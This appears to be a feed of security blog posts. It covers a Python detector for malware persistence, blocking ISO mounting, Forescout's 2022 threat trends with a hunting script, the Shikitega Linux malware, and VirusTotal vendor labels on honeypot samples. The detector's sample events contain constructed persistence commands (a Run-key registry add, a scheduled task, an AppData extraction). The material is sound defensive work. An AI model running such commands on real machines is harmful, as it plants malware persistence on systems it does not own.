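        hits = detect(ev)
        if hits:
            out[ev.cmdline] = hits
    return out


SAMPLE_EVENTS = [  # constructed; see module docstring
    ProcessEvent(r"C:\Windows\System32\tar.exe",
                 r'tar -xvf "files.zip" -C "C:\Users\user\AppData\Roaming"',
                 r"C:\Windows\System32\cmd.exe",
                 r'cmd.exe /c ""D:\properties.bat" "'),
    ProcessEvent(r"C:\Windows\System32\reg.exe",
                 r'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" '
                 r'/v Bloom /t REG_SZ /d "C:\Users\user\AppData\Roaming\Bloom\Bloom.exe --qyS7" /f'),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks /create /tn "chrome tab" /tr "C:\Users\user\AppData\Roaming\Bloom\Bloom.exe" /sc minute /mo 10'),
    ProcessEvent(r"C:\Windows\System32\tar.exe",  # benign: admin restoring a backup
                 r'tar -xvf "backup.zip" -C "C:\Temp\restore"',
                 r"C:\Windows\System32\cmd.exe",
                 r'cmd.exe /c "C:\Scripts\restore.bat"'),
]

if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS).items():
        print(hits, "<-", cmdline)
```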

 

Since the infection comes from a user mounting and executing files in an ISO, the best way to stop this is to prevent users from mounting an ISO by double-clicking it. Users are still able to burn a CD from within Windows if needed. Power users who need to open ISOs can use compression utilities.

Mubix (Rob Fuller) has a great article about how to disable this (1). Below are two different options to prevent users from double-clicking ISO files to mount them. The GPO method is a little more complete in its protections; see the article for more details. We have deployed this in my environment to end users’ desktops and have not had any issues to this point, nor any new infections via this method.

GPO

Computer config -> Admin Templates -> System -> Device Installation Restrictions ->

Allow administrators to override Device Installation Restrictions Policies (enabled)
Prevent Installation from devices that match any of these device IDs

Add this exact ID:

SCSI\CdRomMsft____Virtual_DVD-ROM_

Registry Setting

HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount
Value "ProgrammaticAccessOnly" as REG_SZ

(1) https://malicious.link/post/2022/blocking-iso-mounting/ 

If you have done this or something similar, let us know. 

Tom Webb

@twsecblog


Cyberattacks are increasing in number all the time. Indeed, our 2022 Mid-Year Report revealed a 42% global year-on-year increase in attacks. And according to the World Economic Forum’s 2022 Global Risk Report, 95% of cybersecurity issues are traced back to human error. This should be a red flag for all organizations, especially with the transition…

The post The mobile malware landscape in 2022 – Of Spyware, Zero-Click attacks, Smishing and Store Security appeared first on Check Point Software.

Check Point Research reports that FormBook is the most prevalent malware, while the Android spyware Joker takes third place in the mobile index. Apache Log4j Remote Code Execution also returns to first place as the most exploited vulnerability. Our latest Global Threat Index for August 2022 reports that FormBook is now the most prevalent malware,…

The post August’s Top Malware: Emotet Knocked off Top Spot by FormBook while GuLoader and Joker Disrupt the Index appeared first on Check Point Software.

In our companion blog post, Vedere Labs analyzed the main ransomware trends we observed in the first half of 2022, including state-sponsored ransomware, new mainstream targets and evolving extortion techniques. Ransomware is the main threat targeting most organizations nowadays. However, three other notable cyberthreat trends also evolved during this period:

Threat actors – We saw an almost equal split between cybercriminals and state-sponsored actor activity, with the vast majority of malicious activity perpetrated by Russian or Eastern European actors. The main targeted sectors were government and financial services.
New malware – Significant malware families such as wipers, OT/ICS malware and botnets targeted not only IT systems but also many types of IoT devices.
Active hacking groups – Because of the ongoing conflict in Ukraine, hundreds of hacktivists perpetrated DDoS and other types of attacks. Alongside the politically motivated activity, other large groups focusing on data exfiltration for financial gains have been active.

Below we analyze each of these trends in more detail. This is not an exhaustive discussion of the current threat landscape, but rather a series of observations about the most relevant activity we have seen. As in the related ransomware post, at the end we discuss how you can bolster your current defensive strategies to account for these developments.

Cybercriminals and state-sponsored threat actors

The figures in this section are based on data from the Forescout Device Cloud, one of the world’s largest repositories of connected enterprise device data — including IT, OT and IoT device data — whose number of devices grows daily. The anonymous data comes from Forescout customer deployments and contains information about almost 19 million devices. More specifically, we look at requests to known malicious domains originating from our customer networks between January 1 and April 20, then match them to known advanced persistent threats (APTs).

Figure 1 – Malicious requests by threat actor country of origin

Figure 1 shows the percentage of malicious requests based on the threat actor’s country of origin. Russia and Eastern Europe host an overwhelming majority (83%) of the threat actors we observed, followed by China (9%) and Pakistan (5%).

We have observed in total 19 threat actors active on monitored networks in the first half of 2022. Known state-sponsored actors accounted for 53% of the activity we observed, and the remaining 47% was due to cybercriminal groups.

The top observed actors were APT29/Cozy Bear, IcedID/Lunar Spider, Evil Corp/Indrik Spider, FIN7/Carbon Spider and Temper Panda. The first four are based in Russia while the last is based in China. The first and last are state-sponsored actors, while the three in the middle are cybercriminals.

The observed actors targeted many different sectors, as shown in Figure 2. Government networks were targeted most often (41%), followed by financial services (28%). Both sectors have long been preferred targets for cyber activities.

Figure 2 – Malicious requests by targeted sector

New malware – wipers, OT/ICS malware and botnets

Vedere Labs observes thousands of new exploit and malware samples every day, either from public sources or from attacks on our Adversary Engagement Environment, a set of publicly accessible honeypots. Most of these artifacts are variations of known malicious tools, including WannaCry samples – which is still very much active even five years after the initial infections – and exploit attempts on Log4j vulnerabilities – which have recently been declared endemic by a new DHS Cyber Safety Review Board.

The most interesting malware developments typically garner attention because of new malicious capabilities, who is deploying the malware or whom it is targeting – and often because of a combination of the three aspects. Beyond several previously covered ransomware families, the first half of 2022 saw many new relevant malware instances.

Destructive wipers

Several wipers were used for sabotage or to destroy evidence as part of the ongoing conflict in Ukraine. This type of malware typically overwrites or encrypts either files or the master boot record (MBR)/master file table (MFT) of a system. Since their impact is similar to ransomware, often attackers disguise the malware as ransomware by adding fake ransom notes to mislead incident responders or to hide their motivations. The most interesting wiper detected so far this year was AcidRain, which was used against VIASAT KA-SAT modems on February 24, rendering more than 5,000 wind turbines in Germany unable to communicate.

OT/ICS-specific malware

OT/ICS malware continues to abuse insecure-by-design native capabilities of OT equipment. Industroyer2 and INCONTROLLER, two new samples of OT/ICS-specific malware, were disclosed to the public almost simultaneously in mid-April. Industroyer2 leverages OS-specific wipers and a dedicated module to communicate over the IEC-104 protocol for electrical substations, while the INCONTROLLER toolkit contains modules to read/write from/to ICS devices using industrial network protocols, such as OPC UA, Modbus, CODESYS and Omron FINS.

Persistent and emerging botnets

Many botnets either appeared, reappeared or became known for the first time in 2022. Emotet, one of the largest botnets ever until its shutdown in 2021, returned with hundreds of thousands of new infections and was distributed in new campaigns using malicious emails. The Cyclops Blink botnet, developed by the Sandworm APT as a possible successor to VPNfilter, had been active since 2019 but was discovered at the beginning of this year and taken down soon after discovery. Keksec, a criminal group known for operating several botnets, such as Gafgyt and Simps, developed and open-sourced a new botnet called EnemyBot, reusing code from Mirai and other botnets with several exploits for IoT devices as well as enterprise IT applications.

Remote Access Trojan (RAT)

ZuoRAT is a recent Remote Access Trojan (RAT) that leverages exposed and vulnerable routers for initial infection, enumerates IT devices connected to the network, then uses DNS and HTTP hijacking to install other malware on the identified devices. Disturbingly, this malware can automatically jump from IoT to IT assets. Researchers have speculated that it is operated by a state-sponsored group because of its complexity.

Hacking groups

Two types of hacking groups were active in the first half of 2022: hacktivists and data extortion groups. Hacktivists are mainly politically motivated, especially because of the war in Ukraine. Data extortion groups are very similar to ransomware gangs in that they focus on exfiltrating data and demanding a ransom to not release it publicly. However, they employ different malware and do not operate a ransomware-as-a-service model.

Hacktivists

More than 100 groups have conducted cyberattacks since the beginning of the Russian invasion of Ukraine. The attacks were mostly DDoS, but also included data breaches, the use of wipers and distribution of propaganda. Some groups claimed attacks on critical infrastructure, such as disabling electric vehicle chargers in Moscow and railways in Belarus.

Most of these groups are located in Russia or Ukraine but others are in Belarus, Turkey, Romania, Poland, Portugal and Italy. They usually communicate and coordinate their actions via Twitter or Telegram. Killnet became the most notorious group, using simple DDoS tools to take down websites of critical infrastructure companies in the U.S. and Europe such as airports, banks and government agencies. They also spread propaganda to more than 100,000 members of their Telegram channel.

Data extortion groups

LAPSUS$ is a hacking group that has been active since 2021 and has breached several high-profile organizations, starting with major Brazilian governmental agencies and companies. In 2022 it moved on to global businesses such as Microsoft, Nvidia and Okta. Following a series of arrests in the UK in March, the group has been mostly silent. Of particular interest were the intensive use of stolen credentials and cooperating insiders for their hacks, as well as their strong social media presence. Other groups focusing on data extortion include RansomHouse and Karakurt. The latter is connected to the Conti ransomware gang.

Mitigation recommendations

The proliferation of IoT devices continues to expand the digital terrains of organizations, without commensurate attention to securing them. Both cybercriminals and state-sponsored actors are well aware of this. Therefore, we recommend that mitigation strategies prioritize securing the increased attack surface based on up-to-date threat intelligence.

The mitigations suggested for ransomware also apply to the threats analyzed here. Additional recommendations include:

• Segment the network to isolate IT and OT, limiting network connections to only specifically allowed management and engineering workstations – thus decreasing the probability of OT/ICS malware reaching its target. Use an OT-aware, DPI-capable monitoring solution to alert on malicious indicators and behaviors, watching internal systems and communications for known hostile actions.
• Monitor insider threats, large data transfers and activity in dark nets to prevent or mitigate data leakage by hacktivists and data extortion groups. In particular, monitor known data leaks for exposed credentials.
• Use strong and unique passwords and employ multifactor authentication whenever possible to ensure that stolen credentials cannot easily be used against your organization.
• Follow the NCSC-UK’s guide on Denial of Service attacks, which includes understanding weak points in your service, ensuring that service providers can handle resource exhaustion, scaling the service to handle concurrent sessions, preparing a response plan and stress testing systems regularly.
• Identify and patch vulnerable IoT devices to prevent them from being used as part of DDoS botnets. Also change default or easily guessable passwords on these IoT devices.
• Monitor the traffic of IoT devices to identify those being used as part of distributed attacks.

Besides relying on protection of assets and identification of attacks via intrusion detection, hunt for threats in your network using specific IoCs and known TTPs, such as the use of valid credentials from unknown endpoints followed by large data transfers for hacking groups.
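The hunt described above – a valid login from an endpoint you do not manage, followed by an unusually large outbound transfer – can be expressed as a small correlation over two log sources. The following Python is an added illustration written for this page, not Vedere Labs' or Forescout Frontline's tooling. The sshd lines, the egress accounting records and the KNOWN_ENDPOINTS ranges are all constructed; the two-hour window and the 500 MB threshold are assumed tuning values, and the syslog year is assumed because the timestamps carry none.

```python
import re
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Constructed sshd log lines (not Vedere Labs telemetry). Syslog timestamps
# carry no year, so the parser assumes one.
SSHD_LOG = """\
Jun 10 08:12:01 bastion sshd[4011]: Accepted password for alice from 203.0.113.7 port 51234 ssh2
Jun 10 08:20:44 bastion sshd[4020]: Accepted publickey for bob from 10.10.3.4 port 50122 ssh2
Jun 10 08:31:09 bastion sshd[4033]: Failed password for carol from 198.51.100.20 port 40001 ssh2
Jun 10 08:35:50 bastion sshd[4040]: Accepted password for carol from 198.51.100.9 port 40188 ssh2
"""

# Constructed egress accounting records: timestamp,user,src_ip,bytes_out
EGRESS_CSV = """\
2022-06-10T09:30:00,alice,203.0.113.7,700000000
2022-06-10T09:05:00,bob,10.10.3.4,900000000
2022-06-10T08:50:00,carol,198.51.100.9,10000000
2022-06-10T14:00:00,alice,203.0.113.7,50000000
"""

# Hypothetical allow-list of managed endpoint ranges; a real deployment would
# take this from the asset inventory.
KNOWN_ENDPOINTS = [ip_network("10.10.0.0/16"), ip_network("192.168.5.0/24")]

ACCEPT_RE = re.compile(
    r"^(?P<mon>\w{3}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_sshd_accepts(text, year=2022):
    """Return (timestamp, user, source_ip) for each successful sshd login."""
    events = []
    for line in text.splitlines():
        m = ACCEPT_RE.match(line)
        if not m:  # failed logins and unrelated lines are not valid-credential use
            continue
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}",
                               "%Y %b %d %H:%M:%S")
        events.append((ts, m["user"], m["ip"]))
    return events


def parse_egress(text):
    rows = []
    for line in text.splitlines():
        ts, user, ip, nbytes = line.split(",")
        rows.append((datetime.fromisoformat(ts), user, ip, int(nbytes)))
    return rows


def is_known_endpoint(ip):
    addr = ip_address(ip)
    return any(addr in net for net in KNOWN_ENDPOINTS)


def hunt_credential_exfil(auth_text, egress_text,
                          window=timedelta(hours=2), threshold=500_000_000):
    """Flag a valid login from an unmanaged endpoint that is followed, within
    `window`, by more than `threshold` bytes leaving from the same user and
    source address. Both tuning values are assumptions for the example."""
    transfers = parse_egress(egress_text)
    findings = []
    for ts, user, ip in parse_sshd_accepts(auth_text):
        if is_known_endpoint(ip):
            continue
        total = sum(b for t_ts, t_user, t_ip, b in transfers
                    if t_user == user and t_ip == ip and ts <= t_ts <= ts + window)
        if total > threshold:
            findings.append({"user": user, "src_ip": ip,
                             "login": ts.isoformat(), "bytes_out": total})
    return findings


if __name__ == "__main__":
    for f in hunt_credential_exfil(SSHD_LOG, EGRESS_CSV):
        print(f)
```

On the constructed data only alice is flagged: bob's transfer is larger but comes from a managed range, carol's login is from an unknown address but moves little data, and the failed login never counts as credential use. In production the same join runs over your SIEM's authentication and flow tables, with the allow-list and threshold tuned per environment.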

Threat hunting and incident response

Forescout Frontline is a threat hunting, risk identification and incident response service for organizations that lack the internal resources and visibility to defend themselves from or respond to cybersecurity attacks. Forescout Frontline works in close collaboration with Vedere Labs, leveraging the intelligence we provide to identify ongoing attacks in real organizations.


The post Cyberthreat Trends in 2022H1: Threat Actors Observed, New Malware and Active Hacking Groups appeared first on Forescout.


Spyware, ransomware and cryptojacking malware have been increasingly detected on industrial control system (ICS) computers, according to data collected in the first half of 2022 by cybersecurity firm Kaspersky.


It’s pretty nasty:

The malware was dubbed “Shikitega” for its extensive use of the popular Shikata Ga Nai polymorphic encoder, which allows the malware to “mutate” its code to avoid detection. Shikitega alters its code each time it runs through one of several decoding loops that AT&T said each deliver multiple attacks, beginning with an ELF file that’s just 370 bytes.

Shikitega also downloads Mettle, a Metasploit interpreter that gives the attacker the ability to control attached webcams and includes a sniffer, multiple reverse shells, process control, shell command execution and additional abilities to control the affected system.

[…]

The final stage also establishes persistence, which Shikitega does by downloading and executing five shell scripts that configure a pair of cron jobs for the current user and a pair for the root user using crontab, which it can also install if not available.

Shikitega also uses cloud hosting solutions to store parts of its payload, which it further uses to obfuscate itself by contacting via IP address instead of domain name. “Without [a] domain name, it’s difficult to provide a complete list of indicators for detections since they are volatile and they will be used for legitimate purposes in a short period of time,” AT&T said.

Bottom line: Shikitega is a nasty piece of code. AT&T recommends Linux endpoint and IoT device managers keep security patches installed, keep EDR software up to date and make regular backups of essential systems.

Another article.

Slashdot thread.

[This post was submitted by Jesse La Grew]

VirusTotal has become an important tool for researchers and defenders alike. Unusual executables or files can be uploaded to get an idea of how different antivirus vendors will classify them. Keeping the discovery of customized malware secret is also important and, in those cases, file hashes can be used to find any preexisting results. It should always be assumed that any file submitted to VirusTotal is being looked at by someone. The malware seen by public honeypots, such as the DShield honeypot, is generally not considered sensitive: malware seen by these devices is being broadly used around the world in an attempt to compromise IoT (Internet of Things) devices.
Examples below are from a honeypot that is configured to submit samples to VirusTotal when a new file is downloaded from or uploaded to the honeypot [3]. This helps to summarize attacks and attempt to classify the type of malware being used. A common finding is that naming conventions and results differ considerably from vendor to vendor.
Figure 1: VirusTotal results for a file created on honeypot

Vendors With No Results

A surprising item was just how many vendors never gave any results for files seen on this honeypot. 

• Acronis
• Alibaba
• APEX
• BitDefenderFalx
• Bkav
• CMC
• CrowdStrike
• Cybereason
• Cylance
• eGambit
• Endgame
• F-Prot
• Invincea
• Kingsoft
• Malwarebytes
• Paloalto
• Qihoo-360
• SUPERAntiSpyware
• SymantecMobileInsight
• TACHYON
• tehtris
• TotalDefense
• trapmine
• Trustlook
• VBA32
• Webroot
• Zoner

A possibility is that many of these vendors are not supplying data at this time or may not have been used in VirusTotal results in the past. These vendor lists do change over time:

• 73 providers in the date range 6/7/2022 – 7/31/2022
• 82 providers in the date range 6/7/2022 – 9/3/2022

That means that in the last month there has been an increase of 9 vendors, although this doesn’t account for any vendors that may also have been removed in that time.

Suggested Threat Results

VirusTotal will also give general threat classifications that can help to give a good high-level picture. 

| VT Threat Classification | Count | Percentage |
| --- | --- | --- |
| trojan.shell/malkey | 5579 | 52.43% |
| trojan.shell/linux | 3816 | 35.86% |
| downloader.bash/miraia | 299 | 2.81% |
| downloader.shell | 277 | 2.60% |
| trojan.linux/mirai | 119 | 1.12% |
| downloader. | 118 | 1.11% |
| trojan.mirai/linux | 92 | 0.86% |
| downloader.bash/linux | 54 | 0.51% |
| trojan.linux/shell | 53 | 0.50% |
| downloader.miraia/bash | 31 | 0.29% |

Out of over 10,000 different honeypot results, files associated with malicious SSH authorized_keys were the most prevalent. Another item high on the list is Mirai, which is a popular botnet [4]. Many Mirai variants are seen on a regular basis by honeypots.

Results Change Over Time

We have already seen that results can differ between vendors; those vendors change, and even VirusTotal threat classifications can sometimes seem inconsistent. Malware changes and new variants appear. Knowledge about this malware also changes, which in turn changes the information received from a variety of tools. Looking at one example, within a 6-hour period the number of vendors flagging a particular hash as malware increased by 13, and the threat classification from VirusTotal also changed from “trojan.mirai/linux” to “trojan.linux/mirai”.

Normalizing the stored hashes with the latest stored VirusTotal threat classification gives a different picture than seen before.

Mirai is still a significant contender for popularity but the use of creating an authorized_keys file is by far the most common. A little help came from Excel and the XLOOKUP function to gather the latest locally stored results for a particular hash [5].
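The normalization step described above (keep only the most recent stored classification per hash, then count) is easy to reproduce without a spreadsheet. The Python below is an added example, not the diary's cowrieprocessor code: STORED_RESULTS is a constructed sample in which HASH_A is built to mirror the 6-hour label change and +13 vendor jump mentioned above, and the helpers show the raw count, the normalized count, and the hashes whose label drifted between checks.

```python
from collections import Counter
from datetime import datetime

# Constructed sample of locally stored VirusTotal lookups, one row per check:
# (sha256 placeholder, time checked, VT suggested threat label, vendors
# flagging the file). Not the diary's data; HASH_A is built to mirror the
# 6-hour change described above.
STORED_RESULTS = [
    ("HASH_A", "2022-08-01T02:00:00", "trojan.mirai/linux", 12),
    ("HASH_A", "2022-08-01T08:00:00", "trojan.linux/mirai", 25),
    ("HASH_B", "2022-08-02T10:00:00", "trojan.shell/malkey", 30),
    ("HASH_B", "2022-08-05T10:00:00", "trojan.shell/malkey", 33),
    ("HASH_C", "2022-08-03T12:00:00", "downloader.bash/miraia", 9),
    ("HASH_C", "2022-08-03T13:00:00", "", 0),  # re-check returned no label yet
]


def raw_counts(rows):
    """Counting every stored row (the 'before' picture) double-counts hashes
    that were checked more than once and keeps superseded labels."""
    return Counter(label for _, _, label, _ in rows if label)


def latest_per_hash(rows):
    """The XLOOKUP-latest-by-date step: keep the most recent non-empty
    classification for each hash."""
    latest = {}
    for sha, ts, label, hits in rows:
        if not label:
            continue
        t = datetime.fromisoformat(ts)
        if sha not in latest or t > latest[sha]["checked"]:
            latest[sha] = {"checked": t, "label": label, "vendors": hits}
    return latest


def classification_counts(rows):
    """One vote per hash, using its latest label."""
    return Counter(v["label"] for v in latest_per_hash(rows).values())


def label_changes(rows):
    """Hashes whose VT label differs between first and last check, with the
    change in vendor detections and the time elapsed in hours."""
    by_hash = {}
    for sha, ts, label, hits in rows:
        if label:
            by_hash.setdefault(sha, []).append((datetime.fromisoformat(ts), label, hits))
    changes = []
    for sha, checks in by_hash.items():
        checks.sort()
        (t0, l0, h0), (t1, l1, h1) = checks[0], checks[-1]
        if l0 != l1:
            changes.append({"sha256": sha, "from": l0, "to": l1,
                            "vendor_delta": h1 - h0,
                            "hours_apart": (t1 - t0).total_seconds() / 3600})
    return changes


if __name__ == "__main__":
    print("raw:       ", raw_counts(STORED_RESULTS))
    print("normalized:", classification_counts(STORED_RESULTS))
    for c in label_changes(STORED_RESULTS):
        print(c)
```

Rows with an empty label (a re-check that returned nothing yet) are ignored rather than treated as a new classification, so a transient gap in VirusTotal's answer does not erase an earlier verdict. Feed the same functions the rows exported from the honeypot's local store to get the normalized picture the diary describes.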

Different Provider Comparisons

So far, this has only focused on suggested classifications from VirusTotal. The naming of these threats from the various vendors also differs quite a bit and we see a much different number of results.

| Provider | Number of Results | No Classification | Provider Data Not Available | Total |
| --- | --- | --- | --- | --- |
| Avast | 1273 | 519 | 0 | 1792 |
| AVG | 1273 | 34 | 485 | 1792 |
| GData | 1201 | 591 | 0 | 1792 |
| DrWeb | 1151 | 641 | 0 | 1792 |
| MicroWorld-eScan | 1132 | 660 | 0 | 1792 |
| Ad-Aware | 1130 | 662 | 0 | 1792 |
| BitDefender | 1128 | 664 | 0 | 1792 |
| FireEye | 1117 | 675 | 0 | 1792 |
| Emsisoft | 1079 | 695 | 18 | 1792 |
| ALYac | 1030 | 762 | 0 | 1792 |
| Ikarus | 1021 | 771 | 0 | 1792 |
| AhnLab-V3 | 971 | 821 | 0 | 1792 |
| TrendMicro | 942 | 850 | 0 | 1792 |
| TrendMicro-HouseCall | 941 | 851 | 0 | 1792 |
| CAT-QuickHeal | 915 | 877 | 0 | 1792 |
| Kaspersky | 796 | 996 | 0 | 1792 |
| Comodo | 775 | 1017 | 0 | 1792 |
| Arcabit | 756 | 1036 | 0 | 1792 |
| Lionic | 714 | 1078 | 0 | 1792 |
| Avira | 701 | 1091 | 0 | 1792 |
| VIPRE | 692 | 262 | 838 | 1792 |
| Cynet | 686 | 1077 | 29 | 1792 |
| ESET-NOD32 | 628 | 1164 | 0 | 1792 |
| MAX | 622 | 1170 | 0 | 1792 |
| Tencent | 562 | 1230 | 0 | 1792 |
| Microsoft | 533 | 1257 | 2 | 1792 |
| Fortinet | 524 | 1239 | 29 | 1792 |
| Cyren | 523 | 1269 | 0 | 1792 |
| Rising | 517 | 1275 | 0 | 1792 |
| McAfee-GW-Edition | 501 | 1290 | 1 | 1792 |
| Sophos | 496 | 1284 | 12 | 1792 |
| McAfee | 486 | 1305 | 1 | 1792 |
| Sangfor | 458 | 1158 | 176 | 1792 |
| Symantec | 422 | 1039 | 331 | 1792 |
| NANO-Antivirus | 405 | 1387 | 0 | 1792 |
| ZoneAlarm | 305 | 1478 | 9 | 1792 |
| Google | 188 | 60 | 1544 | 1792 |
| F-Secure | 155 | 1637 | 0 | 1792 |
| Antiy-AVL | 121 | 890 | 781 | 1792 |
| ClamAV | 107 | 1671 | 14 | 1792 |
| SentinelOne | 94 | 1698 | 0 | 1792 |
| Elastic | 74 | 1707 | 11 | 1792 |
| MaxSecure | 72 | 1710 | 10 | 1792 |
| Jiangmin | 71 | 1721 | 0 | 1792 |
| Avast-Mobile | 70 | 1722 | 0 | 1792 |
| BitDefenderTheta | 59 | 1729 | 4 | 1792 |
| Zillya | 56 | 1736 | 0 | 1792 |
| VirIT | 51 | 1726 | 15 | 1792 |
| ViRobot | 48 | 1744 | 0 | 1792 |
| Gridinsoft | 23 | 1758 | 11 | 1792 |
| Yandex | 22 | 1770 | 0 | 1792 |
| Baidu | 7 | 1785 | 0 | 1792 |
| Panda | 5 | 1780 | 7 | 1792 |
| K7AntiVirus | 2 | 1790 | 0 | 1792 |
| K7GW | 2 | 1790 | 0 | 1792 |
| CMC | 0 | 995 | 797 | 1792 |
| TACHYON | 0 | 1792 | 0 | 1792 |
| Malwarebytes | 0 | 1774 | 18 | 1792 |
| Trustlook | 0 | 1792 | 0 | 1792 |
| Zoner | 0 | 1792 | 0 | 1792 |
| BitDefenderFalx | 0 | 1781 | 11 | 1792 |
| TotalDefense | 0 | 11 | 1781 | 1792 |
| eGambit | 0 | 14 | 1778 | 1792 |
| Kingsoft | 0 | 1783 | 9 | 1792 |
| Acronis | 0 | 1792 | 0 | 1792 |
| Invincea | 0 | 11 | 1781 | 1792 |
| CrowdStrike | 0 | 1792 | 0 | 1792 |
| F-Prot | 0 | 11 | 1781 | 1792 |
| VBA32 | 0 | 1792 | 0 | 1792 |
| APEX | 0 | 1792 | 0 | 1792 |
| tehtris | 0 | 1777 | 15 | 1792 |
| SUPERAntiSpyware | 0 | 1792 | 0 | 1792 |
| Webroot | 0 | 1792 | 0 | 1792 |
| SymantecMobileInsight | 0 | 1792 | 0 | 1792 |
| Qihoo-360 | 0 | 11 | 1781 | 1792 |
| Cybereason | 0 | 1671 | 121 | 1792 |
| Endgame | 0 | 11 | 1781 | 1792 |
| Alibaba | 0 | 1792 | 0 | 1792 |
| Bkav | 0 | 1792 | 0 | 1792 |
| Trapmine | 0 | 1746 | 46 | 1792 |
| Paloalto | 0 | 1792 | 0 | 1792 |
| Cylance | 0 | 1787 | 5 | 1792 |

The end of this list also highlights the vendors that did not have any results. Looking at some of the most popular providers, we also see differences in how threats are named.

| Avast Result | Count | VirusTotal Suggested Threats |
| --- | --- | --- |
| Other:Malware-gen [Trj] | 517 | ‘trojan.shell/linux’, ‘trojan.shell/malkey’, ‘trojan.linux/bruteforce’, ‘trojan.linux/shell’, ‘trojan.linux/bash’, ‘trojan.linux/sshbru’, ‘trojan.linux’ |
| BV:Downloader-AAN [Drp] | 185 | ‘downloader.linux’, ‘trojan.linux/shell’, ‘downloader.bash/linux’, ‘downloader.bash/miraia’, ‘downloader.linux/bash’, ‘downloader.linux/shell’ |
| BV:Downloader-AEH [Drp] | 146 | ‘downloader.miraia/bash’, ‘trojan.linux/mirai’, ‘downloader.linux’, ‘downloader.gen2’, ‘downloader.bash/linux’, ‘downloader.’, ‘downloader.shell’, ‘downloader.bash/miraia’ |
| BV:Agent-BAP [Trj] | 97 | ‘trojan.shell/linux’, ‘trojan.linux/shell’, ‘trojan.ircbot/shell’, ‘trojan.ircbot/linux’, ‘trojan.linux/ircbot’, ‘trojan.shell/ircbot’ |
| BV:Downloader-II [Trj] | 93 | ‘trojan.shell/vsntcg22’, ‘downloader.’, ‘downloader.jvhi/shell’, ‘downloader.shell’, ‘downloader.shell/linux’ |
| BV:Downloader-OJ [Drp] | 78 | ‘trojan.shell’, ‘downloader.shell’, ‘trojan.shell/gen2’ |
| ELF:Mirai-BOD [Trj] | 25 | ‘trojan.mirai/linux’, ‘trojan.linux/mirai’ |
| ELF:Xorddos-AB [Trj] | 23 | ‘trojan.linux/xorddos’ |
| BV:Downloader-APV [Drp] | 19 | ‘downloader.bash/miraib’, ‘downloader.miraib/bash’ |
| ELF:Miner-KC [Trj] | 19 | ‘trojan.linux’, ‘trojan.linux/uselvhs22’, ‘trojan.linux/multiverze’, ‘trojan.linux/tygpz’ |
| BV:Downloader-APK [Drp] | 17 | ‘downloader.bash/miraib’, ‘trojan.linux/shell’, ‘downloader.shell/bashdlod’, ‘downloader.miraib/bash’ |
| ELF:BitCoinMiner-HF [Trj] | 9 | ‘miner.linux/camelot’ |
| ELF:Mirai-ADP [Trj] | 9 | ‘trojan.mirai/linux’, ‘trojan.linux/mirai’ |
| ELF:Mirai-AHC [Trj] | 5 | ‘trojan.linux/mirai’ |
| Perl:IRCBot-AD [Trj] | 4 | ‘ircbot/perl’ |
| Perl:IRCBot-D [Trj] | 4 | ‘trojan.perl/shellbot’ |
| ELF:Mirai-ARL [Trj] | 4 | ‘trojan.linux/gafgyt’ |
| ELF:Mirai-BWY [Trj] | 4 | ‘trojan.mirai/linux’ |
| BV:Downloader-AMZ [Drp] | 4 | ‘trojan.shell/smlbr’, ‘trojan.smlbr/shell’ |
| ELF:Mirai-AAJ [Trj] | 3 | ‘trojan.mirai/linux’ |
| Perl:Shellbot-O [Trj] | 2 | ‘trojan.perl/shellbot’ |
| ELF:Mirai-BXS [Trj] | 2 | ‘trojan.mirai/linux’ |
| ELF:MiraiDownloader-MX [Trj] | 1 | ‘trojan.linux/mirai’ |
| ELF:Goldfishgang-A [Bot] | 1 | ‘trojan.mirai/linux’ |
| ELF:Mirai-APD [Trj] | 1 | ‘trojan.mirai/linux’ |
| ELF:MiraiDownloader-MR [Drp] | 1 | ‘downloader.linux/mirai’ |

Avast and AVG have the same results and numbers, which is likely due to Avast acquiring AVG in 2016 [6].

| GData Result | Count | VirusTotal Suggested Threats |
| --- | --- | --- |
| Trojan.Shell.Agent.V | 452 | ‘trojan.shell/linux’, ‘trojan.shell/malkey’ |
| Trojan.Shell.Agent.U | 100 | ‘trojan.shell/linux’, ‘trojan.linux/shell’, ‘trojan.ircbot/shell’, ‘trojan.ircbot/linux’, ‘trojan.linux/ircbot’, ‘trojan.shell/ircbot’ |
| Script.Trojan.Agent.Q2DN10 | 73 | ‘downloader.’, ‘downloader.shell’, ‘downloader.shell/linux’ |
| Trojan.GenericKD.39794855 | 56 | ‘trojan.shell’ |
| Trojan.GenericKD.50084125 | 32 | ‘trojan.’, ‘trojan.linux/bruteforce’, ‘trojan.linux/shell’, ‘trojan.linux/sshbru’, ‘trojan.linux’ |
| Linux.Trojan.Mirai.B | 29 | ‘trojan.mirai/linux’, ‘trojan.linux/mirai’ |
| Linux.Application.CoinMiner.AH (2x) | 20 | ‘trojan.linux/shell’, ‘trojan.linux/bash’ |
| Script.Trojan.Agent.SLJ1UA | 20 | ‘trojan.shell’, ‘trojan.shell/gen2’ |
| Trojan.Linux.GenericKD.39722060 | 15 | ‘trojan.linux/multiverze’, ‘trojan.linux/tygpz’ |
| Trojan.Downloader.JVHI | 13 | ‘downloader.jvhi/shell’ |
| Trojan.Linux.Generic.208033 | 12 | ‘trojan.linux/xorddos’ |
| Generic.Bash.MiraiA.30F5F415 | 11 | ‘downloader.bash/miraia’ |
| Trojan.Linux.GenericA.73252 | 11 | ‘trojan.linux/xorddos’ |
| Generic.Bash.MiraiB.CB1F6D93 | 10 | ‘downloader.miraib/bash’ |
| Script.Trojan.Agent.Z0E85G | 10 | ‘downloader.shell/bashdlod’, ‘trojan.linux/shell’ |
| Generic.Bash.MiraiA.1042638E | 9 | ‘downloader.miraia/bash’ |
| Trojan.Linux.Generic.261801 | 8 | ‘trojan.linux/shell’ |
| Generic.Bash.MiraiA.FC226613 | 8 | ‘downloader.bash/linux’ |
| Trojan.Linux.GenericKD.40003689 | 8 | ‘trojan.linux’, ‘trojan.linux/uselvhs22’ |
| Generic.Bash.MiraiA.37E69EBB | 7 | ‘downloader.bash/miraia’ |
